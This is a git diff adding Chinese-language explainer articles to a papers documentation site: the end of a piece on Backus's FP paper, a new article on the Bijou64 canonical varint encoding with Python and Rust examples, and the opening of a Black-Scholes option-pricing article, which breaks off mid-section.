+|------|------|----------------| +| `f ∘ g` | composition | 先 `g` 后 `f` | +| `[f, g, …]` | construction | 对同一输入并行得到多个结果,组成序列 | +| `α f` | ApplyToAll | 对序列每个元素应用 `f` | +| `/ f` | Insert | 用二元运算 `f` 从左到右「折叠」序列 | +| `p → f, g` | condition | 谓词 `p` 为真用 `f`,否则 `g` | + +还有 `while`、`bu`(binary-to-unary)等。Backus 强调:组合子不是随手加的语法糖,而是**程序代数的运算符号**,要选那些**既有编程威力、又有漂亮代数定律** 的形式。 + +### 5. 名篇对比:内积(inner product) + +**冯·诺依曼风格**(Algol 味伪代码): + +```text +c := 0 +for i := 1 step 1 until n do + c := c + a[i] * b[i] +``` + +Backus 列举的缺陷:隐式状态、非层次、必须** mentally execute** 才能懂、按字重复、长度 `n` 写死在程序里、参数名绑死 `a`/`b`、下标与 `for` 等「家务代码」散落各处。 + +**FP 风格**(论文原式): + +```text +Def IP ≡ (/+) ∘ (α ×) ∘ trans +``` + +读法:对一对向量先 **transpose** 成逐元素对,再 **α ×** 逐对相乘,再 **/+** 用 `+` 折叠成标量。整个定义**无变量、无循环、无长度参数**,对任意等长向量即成立。 + +### 6. 程序代数(algebra of programs) + +变量不是整数 `x`,而是**程序本身**;运算不是 `+` `×`,而是 **∘、α、/** 等组合子。定律例子(论文中的风格): + +- **分配**:`distl ∘ [f, [g₁, …, gₙ]]` 与「对每个 `gᵢ` 先配对再并行」等价 +- **条件穿透组合**:`(p → f, g) ∘ h` 等价于 `p ∘ h → f ∘ h, g ∘ h` +- **递归展开定理**:对满足 `f ≡ p → g; Q(f)` 的递归定义,可展开成无限(或有限)层级的条件组合,从而**证明 `!` 就是阶乘** + +这意味着:**证明 = 代数变形**,不必离开 FP 记号去讲一阶逻辑。 + +### 7. AST:既要历史敏感,又不要字字改状态 + +纯 FP 无存储,做不了「先运行程序 A 再运行程序 B,B 能读到 A 写的磁盘」这类事。Backus 的 **Applicative State Transition(AST)** 系统折中: + +- 底层用应用式语言写程序 +- **一次重大计算只发生一次状态转移** +- 状态结构简单,转移规则简单 + +这是后来 **I/O monad、STM、Effect 系统、纯函数 + 边界副作用** 等思路的史前化石——当时只有草图,没有成熟实现。 + +## 实践案例 + +### 案例 1:用 Python 模拟 FP 内积(理解 `/` 与 `α`) + +现代语言里没有 Backus 的 `trans` 原语,但可以用「转置成逐对 + map + reduce」体会论文 §5.2 的求值过程。对向量 `a = [1,2,3]`、`b = [6,5,4]`: + +```python +from functools import reduce +import operator + +def inner_product(a, b): + # trans: 把 看成列向量对,逐元素配对 + pairs = list(zip(a, b)) # 等价于 α× 之前的结构 + products = [x * y for x, y in pairs] # α× + return reduce(operator.add, products, 0) # /+ + +assert inner_product([1, 2, 3], [6, 5, 4]) == 28 +``` + +论文手算轨迹正是:`trans` → 得到 `<<1,6>, <2,5>, <3,4>>` → 逐对 `×` → `fold +` → `28`。注意:**没有索引变量 `i`,没有累加器 `c` 的逐步突变**——三个概念步骤对应三个组合段。 + +若用 Haskell 更接近原文精神: + +```haskell +ip :: Num a => [a] -> [a] -> a +ip a b = foldr (+) 0 (zipWith (*) a b) +-- 概念上: foldr (+) 0 . map (uncurry (*)) . uncurry zip +-- 即 /+ ∘ α× ∘(配对) +``` + +### 案例 2:阶乘的 FP 定义与代数证明思路 + +论文 §11.3.1 用组合子写阶乘(无 `lambda`、无命名参数): + +```text +Def ! ≡ eq0 → 1; × ∘ [id, ! ∘ sub1] +Def eq0 ≡ eq ∘ [id, 0] +Def sub1 ≡ - ∘ [id, 1] +``` + +读法:若参数是 0 则返回 1;否则返回 `n * !(n-1)`——但全文**没有出现变量名 `n`**,只有 `id`、选择器和组合。 + +对 `!:2` 的求值(论文逐步展开): + +```text +!:2 +→ (eq0 → 1; × ∘ [id, ! ∘ sub1]):2 +→ eq0:2 为假,走 × 分支 +→ ×:<2, !:1> +→ ×:<2, 1> -- 因为 !:1 最终归约到 1 +→ 2 +``` + +**代数侧**:Backus 用递归定理把满足 `f ≡ eq0 → 1; × ∘ [id, f ∘ sub1]` 的 `f` 展开,证明它与数学阶乘一致——而不是对 `while` 循环做归纳。现代读者可以把这看成 **catamorphism / fold** 理论的先声:递归是组合子的**不动点**,证明是**展开定律**。 + +### 案例 3:矩阵乘也是「四段组合管道」 + +论文给出(读作从右向左应用): + +```text +Def MM ≡ (α α IP) ∘ (α distl) ∘ distr ∘ [1, trans ∘ 2] +``` + +没有三重 `for i, j, k`,而是:**构造参数对 → 分发 → 对每一行做 α → 每行内再做 α IP**。这是 Hughes 后来《Why Functional Programming Matters》里「拆 + 粘」的史前版本——Backus 用一行定义把「矩阵 = 行的序列」这一表示方式吃透。 + +## 冯·诺依曼语言为何「又胖又弱」 + +Backus 的批评可以收成一张检查表: + +1. **字逐字编程**继承自字逐字机器 +2. **语义与状态转移紧耦合** → 框架不得不巨大 +3. **表达式 / 语句分裂** → 组合子威力减半 +4. **命名与替换规则过重**(call-by-name/value、指针、下标)→ 阻碍无参数组合 +5. **缺乏可机械使用的代数** → 证明只能活在逻辑/公理语义里,与写程序的语言脱节 + +他不是说 Fortran/C **不能**写正确软件,而是说:**每加一层「时髦特性」(强类型、结构化控制)只是在肥胖躯体上打补丁,没有换骨架。** + +## 与今天的关系 + +| 当年概念 | 今日对应 | +|----------|----------| +| `α` ApplyToAll | `map`、SIMD、向量指令 | +| `/` Insert | `reduce` / `fold`、MapReduce、`sum()` | +| `∘` composition | 函数管道 `f . g`、`pipe`、方法链 | +| 程序代数 | 等价变换、fusion laws、`shortcut fusion` | +| 无变量函数 | 点自由风格、combinators、point-free Haskell | +| AST 系统 | `IO` Monad、纯函数 + 显式效应边界 | +| 冯·诺依曼瓶颈 | 内存墙、GPU 批量计算、数据流框架 | + +也要诚实看到局限:**Backus FP 从未成为工业主流语言**;λ 演算、类型论、Monad、范畴论接过了「可证明、可组合」的火炬。Hughes 1989 年说 Backus 的 FP「过于代数化,工业界看不懂」——但 **map/reduce 组合思想** 已经渗透进几乎每一门现代语言。 + +## 常见误解 + +**误解 1:「函数式 = 禁止赋值」** +Backus 反对的是**冯·诺依曼式赋值作为程序中心**,不是否认所有状态。AST 系统明确要**少量、清晰的状态转移**。 + +**误解 2:「Backus 否定他创造的 Fortran」** +他肯定 Fortran 的历史贡献,但认为 **von Neumann 语言家族** 已到达表达力边际,继续堆特性不如寻找新框架。 + +**误解 3:「FP 论文 = 没有递归」** +论文强调许多程序**非重复、非递归**地表达(如内积三步),但阶乘、矩阵乘仍用递归/组合不动点;关键是**证明靠代数展开**,不是靠盯着 `for` 循环脑补。 + +**误解 4:「结构化编程已经解决了问题」** +Dijkstra 收拾的是 **goto 和语句世界**;Backus 收拾的是 **赋值 + 字逐字 + 表达式/语句分裂**——互补,不是替代。 + +## 延伸阅读 + +- John Backus, *Can Programming Be Liberated from the von Neumann Style?*, CACM 1978 — 本文主来源 +- John Hughes, *Why Functional Programming Matters*, 1989 — 工业界更能读懂的 FP 模块化论证 +- Edsger W. Dijkstra, *Go To Statement Considered Harmful*, 1968 — 结构化编程同一时代的平行批判 +- Kenneth Iverson, APL 系列 — Backus 在文中单独讨论的「部分解放」案例 +- John McCarthy, Lisp — 应用式模型对照组 +- 现代落地:Haskell `Prelude` 中的 `map`/`foldr`/`(.)` 即是组合子思想的后代 + +## 小结 + +Backus 在图灵奖演讲中完成了一次罕见的自我否定:**发明 FORTRAN 的人,号召同行离开冯·诺依曼语言家族。** 他用内积、阶乘、矩阵乘说明,**固定组合子 + 程序代数** 能让人类按「数据流形状」思考,而不是按「存储器地址 + 循环变量」思考。 + +这篇论文或许过于理想化,但它把 **map、reduce、compose** 写进了计算文化的 DNA,也为后来的 **纯函数、效应系统、数据并行** 埋下了种子。若你只记住一句话: + +> **好的编程语言不该逼你通过一条字逐字的窄门去思考;它该给你可组合的模块,让你像代数一样变形和推理程序。** + +那就是 Backus 1978 年留给零基础读者最该带走的核心。 diff --git a/src/content/docs/papers/ben-sasson-stark-2018.md b/src/content/docs/papers/ben-sasson-stark-2018.md index c23de5120..80d061f92 100644 --- a/src/content/docs/papers/ben-sasson-stark-2018.md +++ b/src/content/docs/papers/ben-sasson-stark-2018.md @@ -158,4 +158,5 @@ STARK 用 Merkle 树承诺多项式求值: - [[gabizon-plonk-2019]] —— PLONK: Permutations over Lagrange-bases for Oecumenical Noninteractive arguments of Knowledge - [[gentry-fhe-2009]] —— Gentry FHE — 全同态加密开山 - [[yao-garbled-circuits-1986]] —— Yao 混淆电路 — 让两人合算函数却互不泄密 +- [[zk-snark-pinocchio-2013]] —— Pinocchio 2013 — 首个「近乎实用」的可验证计算与 zk-SNARK 工程系统 diff --git a/src/content/docs/papers/bijou64-varint.md b/src/content/docs/papers/bijou64-varint.md new file mode 100644 index 000000000..41be7dc42 --- /dev/null +++ b/src/content/docs/papers/bijou64-varint.md @@ -0,0 +1,273 @@ +--- +title: Bijou64 — 结构式规范化的变长整数编码 +来源: 'Brooklyn Zelenka / Ink & Switch, "Bijou64: A variable-length integer encoding", tangent 文章 + bijou64/SPEC.md (Subduction CRDT 同步协议), 2026' +日期: 2026-06-13 +子分类: 类型与 PL 理论 +分类: 编程语言 +provenance: pipeline-v3 +--- + +## 从日常类比开始:快递单上的「重量档」 + +寄快递时,计费往往不是「每个包裹都写满 8 位数字」,而是: + +- 轻的小件:面单上直接写 **2 kg**,一行搞定; +- 稍重:写 **档位 + 超出部分**,比如「中档 + 52」表示从该档位起再加 52; +- 最重:档位更高,附带的数字位数也更多。 + +关键是:**同一种重量,柜台只会给你一种写法**。你不能把「0 公斤」写成 `00000000`,也不能用「多贴一张空白续页」把 5 写成 005——否则对账、验签、去重都会乱套。 + +二进制协议里的 **变长整数(varint)** 也是同一逻辑:日志计数、消息长度、CRDT 元数据……多数时候是 **小数字**,偶尔才需要接近 `u64::MAX` 的大数。常见方案如 **LEB128**(Protobuf、WebAssembly、DWARF)用「每字节最高位 = 还有下一字节」来省空间,但 **同一个数可以有多种合法字节序列**——例如 `0` 可以是 `0x00`,也可以是 `0x80 0x00`、`0x80 0x80 0x00`…… + +**Bijou64**(读作 bee-zoo-sixty-four,BIJective Offset U64)是 Ink & Switch 为 **Subduction CRDT 同步协议** 设计的 varint:**每个 `u64` 恰好对应唯一一种字节序列**(双射 / 结构式规范化),本意是修签名验证里的「非规范编码」漏洞, benchmark 上解码还比 LEB128 快约 **2–10 倍**。 + +--- + +## 是什么 + +Bijou64 把 **无符号 64 位整数** 编码成 **1–9 字节** 的序列: + +| 首字节范围 | 总长度 | 含义 | +|------------|--------|------| +| `0x00`–`0xF7`(0–247) | 1 字节 | 首字节 **就是** 数值本身 | +| `0xF8`–`0xFF`(248–255) | 2–9 字节 | 首字节是 **档位标签**,后面跟 big-endian **载荷** | + +多字节档位的解码公式: + +```text +tier = tag - 247 // 1..8 +value = OFFSET[tier] + payload_be +``` + +编码时做逆运算:选合适 tier,发 `tag = 247 + tier`,再发 `(value - OFFSET[tier])` 的 big-endian 字节。 + +与 **VARU64**(同 tag-byte 框架)的关键区别:VARU64 的 payload 是 **数值本身**,所以 `0x00`、`0xF8 0x00`、`0xF9 0x00 0x00` 都能解出 `0`;Bijou64 对每层 **减去累计偏移 OFFSET**,各档数值区间 **不相交**,过长编码在结构上 **不存在**。 + +--- + +## 为什么重要 + +### 1. 安全:规范化不是「解码后再 if 一下」 + +对 **签名过的原始字节**(证书、JWT、区块链交易、CRDT 同步块)来说,「两种字节串 → 同一个数」等于给攻击者 **换皮不重签** 的空间。LEB128 的标准做法是解码后 **拒绝非最短形式**——但这条 `if`: + +- honest 数据的 round-trip 测试 **测不出来**; +- 性能 benchmark **测不出来**; +- 被删掉或移植遗漏时,**只有对抗输入** 才暴露。 + +Bijou64 的策略是:**格式本身写死唯一表示**。解码器只需处理「缓冲区不够」和「tier 8 加法溢出」两种错误,**没有**「非规范编码」这类单独错误码——因为那种输入 **根本不是合法 bijou64**。 + +### 2. 性能:首字节定长,不必扫 continuation bit + +LEB128 解码要 **逐字节看 MSB**,直到某字节最高位为 0;长度与数值大小相关,分支预测在随机大数上很吃亏。 + +Bijou64 读 **第一个字节** 就知道还要读几个字节(查表 `tier = tag - 247`),payload 是 **连续 big-endian**,CPU 上常变成一次 load + `bswap`。Ink & Switch 在 Apple M2 Pro / AMD Zen 5 上测 **4096 个值的 batch**:均匀全 `u64` 分布时 bijou64 约 **0.75 ns/值**,LEB128 约 **7.3 ns/值**;小单字节值约 **2×**,大多数字节 LEB128 约 **8–10×**。 + +### 3. 工程:可排序、可 hexdump + +编码后的 **字节序 lexicographic 顺序 = 数值顺序**,便于键值存储里 **不解码直接二分**。0–247 的常见情况:**hexdump 里一个字节就是值**,调试友好。 + +--- + +## 核心概念 + +### 1. 档位(tier)与 OFFSET 表 + +每个 tier 覆盖一段 **互不重叠** 的数值区间。OFFSET[t] = 「比 tier t 更短的编码所能表示的最大值 + 1」: + +| Tier | Tag | OFFSET(十进制) | 该档 value 范围(含端点) | +|------|-----|------------------|---------------------------| +| 0 | — | 0 | 0 – 247 | +| 1 | `0xF8` | 248 | 248 – 503 | +| 2 | `0xF9` | 504 | 504 – 66,039 | +| 3 | `0xFA` | 66,040 | 66,040 – 16,843,255 | +| … | … | … | … | +| 8 | `0xFF` | 72,340,172,838,076,920 | … – `u64::MAX` | + +递推:`OFFSET[0]=0`,`OFFSET[1]=248`,`OFFSET[n]=OFFSET[n-1]+256^(n-1)`(n≥2)。hex 上可见规律:每层 offset 末尾都是 `…F8`,前面逐层多一个 `01` 前缀。 + +### 2. 双射(bijective)= 规范化的结构保证 + +- **编码**:若 `v < 248` → 单字节 `v`;否则唯一 tier `t` 使 `OFFSET[t] ≤ v < OFFSET[t+1]`,发 tag 与 payload。 +- **解码**:`tag < 248` → 值即 tag;否则 `value = OFFSET[tier]+payload`。 +- 用错 tier 编码会在 round-trip 或 content hash 上 **立刻暴露**(得到另一个数),而不是「静默接受过长形式」。 + +### 3. Tier 8 的边界检查(不是规范化问题) + +9 字节形式(tag `0xFF` + 8 字节 payload)在算术上能表示 **略大于 `u64::MAX`** 的数。规范要求:若 `OFFSET[8]+payload` 溢出 `u64`,解码器 **必须报错**。这是 **范围上限**,不是「多种合法编码」——范围内每个数仍只有一种写法。 + +### 4. 与 LEB128 / VARU64 / SQLite4 varint 的定位 + +| 格式 | 首字节定长? | 结构式唯一编码? | 备注 | +|------|--------------|------------------|------| +| LEB128 | 否(扫 continuation) | 否 | 生态最大,Protobuf/Wasm | +| VARU64 | 是 | 否(需拒绝过长) | bijou64 的 framing 祖先 | +| SQLite4 varint | 是 | 仅前两档 offset | 3+ 档仍可能过长 | +| **Bijou64** | 是 | **是** | Subduction / 需签名的 canonical wire | + +**权衡**:LEB128 升到 2 字节后可一直覆盖到 2¹⁴ 仍占 2 字节;bijou64 的 2 字节档只覆盖 **248–503**(约 256 个数)。若大量 ID 落在 500–16383,LEB128 更省 wire;若 **canonical + 大端 + 首字节定长** 是硬需求,bijou64 更合适。 + +--- + +## 手工走一遍:300 和 67,000 + +**300**(tier 1): + +1. 300 ≥ 248 → 多字节;`OFFSET[1]=248 ≤ 300 < 504=OFFSET[2]` → tier 1。 +2. Tag:`247+1=248` → `0xF8`。 +3. Payload:`300-248=52` → `0x34`。 +4. wire:`F8 34`。注意 **`F8 00` 解出来是 248,不是 0**——0 只能是 `00`。 + +**67,000**(tier 3,SPEC 例题): + +1. `OFFSET[3]=66,040 ≤ 67,000 < OFFSET[4]` → tier 3。 +2. Tag:`0xFA`。 +3. Payload:`67,000-66,040=960` → 3 字节 BE `00 03 C0`。 +4. wire:`FA 00 03 C0`(4 字节)。 + +**1738**(原文图解):3 字节总长(tag + 2 payload),offset `0x1F8`(504),payload 对应 `1738-504=1234`。 + +--- + +## 代码示例 1:Python 参考实现(教学用) + +下面约 40 行,逻辑与 [SPEC](https://github.com/inkandswitch/subduction/blob/main/bijou64/SPEC.md) 一致,便于零基础对照算法(生产环境请用官方 `bijou64` crate 或已审计移植): + +```python +OFFSET = [0, 248, 504, 66040, 16843256, 4311810552, + 1103823438328, 282578800148984, 72340172838076920] +U64_MAX = (1 << 64) - 1 + +def encode_u64(v: int) -> bytes: + if v < 248: + return bytes([v]) + for tier in range(1, 9): + lo, hi = OFFSET[tier], OFFSET[tier + 1] if tier < 8 else U64_MAX + 1 + if lo <= v < hi: + tag = 247 + tier + payload = v - lo + width = tier + return bytes([tag]) + payload.to_bytes(width, "big") + raise ValueError("out of u64 range") + +def decode_bijou64(buf: bytes) -> tuple[int, int]: + if not buf: + raise ValueError("buffer too short") + tag = buf[0] + if tag < 248: + return tag, 1 + tier = tag - 247 + if len(buf) < 1 + tier: + raise ValueError("buffer too short") + payload = int.from_bytes(buf[1 : 1 + tier], "big") + value = OFFSET[tier] + payload + if value > U64_MAX: + raise ValueError("overflow") + return value, 1 + tier + +# SPEC 向量 +assert encode_u64(300) == bytes.fromhex("F8 34") +assert decode_bijou64(bytes.fromhex("FA 00 03 C0"))[0] == 67_000 +``` + +--- + +## 代码示例 2:Rust 官方 API + 流式解析思路 + +crates.io 上的 [`bijou64`](https://crates.io/crates/bijou64)(MIT / Apache-2.0)是 Subduction 的参考实现: + +```rust +// 依赖: bijou64 = "0.2" +use bijou64::{decode, encode, encoded_len, DecodeError}; + +fn round_trip() { + let mut buf = Vec::new(); + encode(300, &mut buf); + assert_eq!(buf, [0xF8, 0x34]); + + let (value, consumed) = decode(&buf).unwrap(); + assert_eq!(value, 300); + assert_eq!(consumed, 2); + assert_eq!(encoded_len(300), 2); +} + +// 协议解析器:首字节定长 → 可 O(1) 跳过未知字段 +fn skip_one_field(data: &[u8]) -> Result<&[u8], DecodeError> { + if data.is_empty() { + return Err(DecodeError::BufferTooShort); + } + let tag = data[0]; + let total = if tag < 248 { 1 } else { 1 + (tag - 247) as usize }; + if data.len() < total { + return Err(DecodeError::BufferTooShort); + } + Ok(&data[total..]) +} +``` + +Kafka 等场景也有 Java 封装(`Bijou64Serializer`):计数器、序号、小 ID 高频 topic 上,相对固定 8 字节 `Long` 可显著省 egress——但 **producer/consumer 必须成对使用**,且语义是 **无符号 u64**(有符号负数需继续用 `LongSerializer`)。 + +--- + +## 测试向量(实现互操作时应覆盖) + +| Value | Hex | +|-------|-----| +| 0 | `00` | +| 42 | `2A` | +| 247 | `F7` | +| 248 | `F8 00` | +| 300 | `F8 34` | +| 504 | `F9 00 00` | +| 67,000 | `FA 00 03 C0` | +| `u64::MAX` | `FF FE FE FE FE FE FE FE 07` | + +**必须报错**:空缓冲;`F9 00`(tier 2 缺 payload);`FF FF FF FF FF FF FF FF FF`(tier 8 溢出)。 + +--- + +## 何时考虑采用 / 何时继续用 LEB128 + +**更适合 bijou64:** + +- 协议对 **原始字节做签名或 content hash**,且不能依赖「每个解码点都写对 canonical check」; +- 需要 **首字节知道长度** 的 streaming / 零拷贝跳过; +- 数值 **大量 < 248** 或需要 **大端 + 字节序可排序**; +- 新项目,愿意引入较新、battle-test 尚少于 LEB128 的格式。 + +**继续 LEB128 更合理:** + +- 已有 Protobuf / Wasm / DWARF 生态,改 wire 成本极高; +- 需要 **非规范过长编码** 做链接器占位(Wasm/DWARF 的 deliberate overlong); +- 大量标识落在 **500–16383** 且极度在意 **2 字节覆盖宽度**; +- 依赖 **SIMD 批量解码** 整条 buffer——社区讨论指出 LEB128 的固定 continuation 位位置更利于 speculative SIMD;bijou64 首字节 8 路分支对 **单值解码** 友好,对 **并行扫窗口** 未必最优。 + +--- + +## 性能与体积(原文 benchmark 摘要) + +- **解码**:相对 LEB128(不含 canonical 检查)约 2–10×;含 canonical 检查差距更大;bijou64 延迟 CDF 更「竖」,方差小。 +- **编码**:多数分布与 LEB128 相当或更快;248–65535 区间 LEB128 约快 1.24×。 +- **体积**: realistic 工作负载下与 LEB128 **相差几个百分点** 量级,不是主要卖点;卖点是 **canonical + 定长首字节 + 解码速度**。 + +--- + +## 生态与延伸阅读 + +- 原文:[Bijou64: A variable-length integer encoding](https://www.inkandswitch.com/tangents/bijou64/)(Ink & Switch Tangents) +- 规范:[inkandswitch/subduction — bijou64/SPEC.md](https://github.com/inkandswitch/subduction/blob/main/bijou64/SPEC.md)(CC BY-SA 4.0) +- Rust crate:[docs.rs/bijou64](https://docs.rs/bijou64/latest/bijou64/) +- 应用背景:Subduction CRDT 同步协议;规范中规划 **bijou32 / bijou128** 同族扩展 +- 对比阅读:LEB128、[VARU64](https://github.com/AljoschaMeyer/varu64-rs)、SQLite4 varint、Git pack offset encoding + +--- + +## 小结 + +Bijou64 把「**每个整数只有一种写法**」从 **解码后的校验** 下沉到 **编码几何**:tag-byte 定长 + 分层 offset,使双射成为格式不变量。它Born 于 CRDT 同步里的签名安全,却附带更快的单值解码路径。零基础记住三句即可: + +1. **0–247**:一个字节就是数本身。 +2. **248–255**:标签;后面几个字节是 **大端 (value − OFFSET)**。 +3. **不能** 用多字节形式「凑」出已在更短档出现过的数——这是与 LEB128 根本不同的安全与语义契约。 + +若你在设计 **新的、要签名或哈希的 binary protocol**,值得把 bijou64 和 LEB128+canonical 放在同一张对比表里;若只是读 Protobuf,知道「业界另一种更严格的 varint 长什么样」也足够扩展视野。 diff --git a/src/content/docs/papers/black-scholes-1973.md b/src/content/docs/papers/black-scholes-1973.md new file mode 100644 index 000000000..dd5f1eec6 --- /dev/null +++ b/src/content/docs/papers/black-scholes-1973.md @@ -0,0 +1,243 @@ +--- +title: Black-Scholes 1973 — 用「对冲复制」给期权和公司债定价 +来源: https://www.cs.princeton.edu/courses/archive/fall09/cos323/papers/black_scholes73.pdf +日期: 2026-06-13 +分类: 其他 +子分类: 量化金融 +provenance: pipeline-v3 +--- + +## 是什么 + +Black & Scholes 1973(*The Pricing of Options and Corporate Liabilities*,*Journal of Political Economy* 81(3):637–654)是现代**衍生品定价**的奠基论文。它回答了一个看似朴素的问题: + +> 一张「到期可按约定价买入一股股票」的合约,**今天**应该卖多少钱? + +日常类比:你开了一家**复印店**,顾客付定金,约定三个月后能以 100 元买走店里某幅限量版画(当前市价 S 元)。版画价格天天变,但你能**随时买卖版画对冲风险**——Black-Scholes 的核心不是「猜未来股价」,而是: + +1. 用股票 + 现金**动态复制**这份合约的 payoff; +2. 若市场上期权价格 ≠ 复制成本,套利者就能无风险赚钱; +3. 因此**唯一合理的价格** = 复制组合的成本 → 闭式公式。 + +论文标题里的 *Corporate Liabilities* 同样重要:公司债、认股权证、甚至股权,都可看成**标的为「公司资产」的期权组合**——同一套分析可算「违约应折多少价」。 + +作者 Fischer Black(芝加哥大学)与 Myron Scholes(MIT);Robert C. Merton 对对冲推导有重要贡献。论文 1970 年投稿、1972 年定稿,曾两次被拒,经 Fama、Miller 推动后 1973 年 5 月发表。Scholes 与 Merton 1997 年获诺贝尔经济学奖(Black 已于 1995 年去世)。 + +## 为什么重要 + +不理解这篇论文,下面这些事都讲不清: + +- 为什么期权价格**不依赖**投资者对股价涨跌的主观预期(风险中性定价) +- 为什么做市商敢说「我 delta 对冲了」——以及 1987 股灾时对冲为何会集体失灵 +- 为什么公司债利率高于国债:不仅是信用,更是**股东持有对资产的看涨期权**,债权人承担下行 +- 为什么 VIX、隐含波动率曲面、奇异期权定价树,全都从这里的 PDE 和公式长出来 +- 为什么 Kelly 1956 谈「信息 → 财富」,Black-Scholes 谈「波动 → 期权费」——两条线后来在量化基金里汇合 + +## 核心要点 + +### 1. 期权术语(论文 Introduction) + +| 术语 | 含义 | +|------|------| +| **Call(看涨期权)** | 有权在到期前/到期日按行权价 K 买入标的 | +| **European** | 仅能在到期日 T 行权(公式针对此类) | +| **American** | 到期前任意时刻可行权(更贵,需数值方法) | +| **Strike / Exercise price (K)** | 行权价 | +| **Maturity (T)** | 到期日 | + +直觉(论文 Figure 1):股价 S 越高,call 越值钱;S ≫ K 时 call ≈ S − 贴现后的 K;S ≪ K 时 call ≈ 0;距到期越近,时间价值越少。 + +### 2. 无套利原则(论文开篇核心句) + +> If options are correctly priced in the market, it should not be possible to make sure profits by creating portfolios of long and short positions in options and their underlying stocks. + +即:**正确价格下,期权 + 股票的多空组合不能无风险套利**。一切推导从这里出发,而非「预测股价会涨会跌」。 + +### 3. 「理想市场」假设 + +论文为推导闭式解假设(后文大量实证与扩展在放松这些条件): + +- 股价服从**几何布朗运动**(对数正态、常数波动率 σ) +- **连续交易**、无摩擦(无手续费、无卖空限制、可借卖) +- 无风险利率 r 恒定 +- 不付股息(后人有扩展) + +在这些假设下,期权价值 w(S, t) **只依赖**当前股价 S、时间 t 和已知常数——可构造**完美对冲组合**。 + +### 4. Delta 对冲与复制 + +记 w(S, t) 为 call 价值。持有一份股票、做空 ∂w/∂S 份期权(论文记为 w_x),组合价值对微小股价变动**一阶免疫**: + +``` +Δ_portfolio ≈ ΔS − (∂w/∂S)·ΔS ≈ 0 +``` + +连续调整对冲比率(**delta**),组合收益应等于无风险利率——由此得到 **Black-Scholes 偏微分方程(PDE)**: + +``` +∂w/∂t + (1/2)σ²S² · ∂²w/∂S² + rS · ∂w/∂S − rw = 0 +``` + +边界条件(欧式 call):到期时 w(S, T) = max(S − K, 0)。 + +**日常类比**:你不是在赌版画涨价,而是像**调色师**不断调整「股票 : 期权」配比,让小店账本对涨跌暂时「无感」;账本只按国债利率爬升,这个爬升率就是期权今天的公平价。 + +### 5. Black-Scholes 闭式公式(欧式 call) + +令 τ = T − t 为剩余期限: + +``` +d₁ = [ln(S/K) + (r + σ²/2)τ] / (σ√τ) +d₂ = d₁ − σ√τ + +C = S·N(d₁) − K·e^(−rτ)·N(d₂) +``` + +P(看跌)由 **put-call parity**: + +``` +P = C − S + K·e^(−rτ) = K·e^(−rτ)·N(−d₂) − S·N(−d₁) +``` + +N(·) 为标准正态 CDF。注意:**公式里不出现股票期望收益率 μ**——对冲消掉了风险溢价,这是论文最令人惊讶的结论之一。 + +论文还给出了用 **CAPM** 的等价推导:期权 β 与股票 β 成比例,风险调整折现与 PDE 路径一致。 + +### 6. 公司负债 = 期权组合 + +论文后半部分:将**公司资产** V 视为标的,**股权** = 以 V 为标的、行权价为债务面值 D 的**看涨期权**(股东在清偿后拿走剩余);**债权** = 无风险债 − 看跌期权(违约相当于资产不足)。因此: + +- 同一 σ、r 可估**信用利差**(违约风险折价) +- 认股权证(warrant)是标准 call 的变体 + +这为 Merton 1974 结构化信用模型等后续工作铺了路。 + +### 7. Greeks(实践延伸,非原文重点) + +| Greek | 含义 | Call(直觉) | +|-------|------|----------------| +| **Delta** ∂C/∂S | 对冲比率 | 0→1,价内越深越大 | +| **Gamma** ∂²C/∂S² | Delta 变化速度 | 平价附近最大 | +| **Theta** ∂C/∂t | 时间衰减 | 通常为负 | +| **Vega** ∂C/∂σ | 对波动率敏感 | 总是为正 | + +## 实践案例 + +### 案例 1:手写 Black-Scholes 定价器 + +```python +import math + +def norm_cdf(x: float) -> float: + """标准正态 CDF Φ(x)""" + return 0.5 * (1.0 + math.erf(x / math.sqrt(2.0))) + +def black_scholes_call(S: float, K: float, tau: float, r: float, sigma: float) -> float: + """欧式看涨:S 现价, K 行权价, tau 剩余年数, r 无风险利率, sigma 波动率""" + if tau <= 0: + return max(S - K, 0.0) + sqrt_tau = math.sqrt(tau) + d1 = (math.log(S / K) + (r + 0.5 * sigma ** 2) * tau) / (sigma * sqrt_tau) + d2 = d1 - sigma * sqrt_tau + return S * norm_cdf(d1) - K * math.exp(-r * tau) * norm_cdf(d2) + +def black_scholes_put(S, K, tau, r, sigma): + c = black_scholes_call(S, K, tau, r, sigma) + return c - S + K * math.exp(-r * tau) # put-call parity + +# 例:S=100, K=100, 3 个月, r=5%, σ=20% +C = black_scholes_call(100, 100, 0.25, 0.05, 0.20) +P = black_scholes_put(100, 100, 0.25, 0.05, 0.20) +print(f"Call ≈ {C:.4f}, Put ≈ {P:.4f}") # Call ≈ 4.62, Put ≈ 3.37 +``` + +**读数**:平价 call 约 4.6 元——不是零,因为三个月内股价仍可能涨过 100;主要价值来自 **vega / 时间价值**。 + +### 案例 2:离散 Delta 对冲模拟 + +真实市场不能连续交易;下面用**每日再平衡**近似论文的连续对冲,观察复制误差: + +```python +import random +import math + +def simulate_gbm_path(S0, mu, sigma, days, dt=1/252): + """几何布朗运动路径(μ 为真实漂移,定价仍用 r)""" + prices = [S0] + for _ in range(days): + z = random.gauss(0, 1) + prices.append(prices[-1] * math.exp((mu - 0.5 * sigma**2) * dt + sigma * math.sqrt(dt) * z)) + return prices + +def delta_call(S, K, tau, r, sigma): + if tau <= 0: + return 1.0 if S > K else 0.0 + sqrt_tau = math.sqrt(tau) + d1 = (math.log(S / K) + (r + 0.5 * sigma**2) * tau) / (sigma * sqrt_tau) + return norm_cdf(d1) + +def delta_hedge_pnl(prices, K, r, sigma, T_years): + """卖 1 份 call,用股票动态对冲;看到期组合能否覆盖 payoff""" + cash = black_scholes_call(prices[0], K, T_years, r, sigma) # 初始收取期权费 + dt = 1 / 252 + shares = 0.0 + for i, S in enumerate(prices[:-1]): + tau = T_years - i * dt + target = delta_call(S, K, tau, r, sigma) + shares_needed = target # 空头 call 需多头股票 + cash -= (shares_needed - shares) * S + shares = shares_needed + cash *= math.exp(r * dt) + ST = prices[-1] + payoff = max(ST - K, 0.0) + final = cash + shares * ST - payoff + return final # ≈0 说明对冲成功 + +random.seed(0) +path = simulate_gbm_path(S0=100, mu=0.10, sigma=0.20, days=63) +err = delta_hedge_pnl(path, K=100, r=0.05, sigma=0.20, T_years=63/252) +print(f"对冲残差(应接近 0): {err:.4f}") +``` + +**要点**:定价用 r 和 σ,**不用真实 μ**;但对冲频率低、σ 突变、有交易成本时,残差会变大——这是模型与实务的主要裂缝。 + +### 案例 3:股权作为「资产看涨期权」(结构化直觉) + +简化 Merton 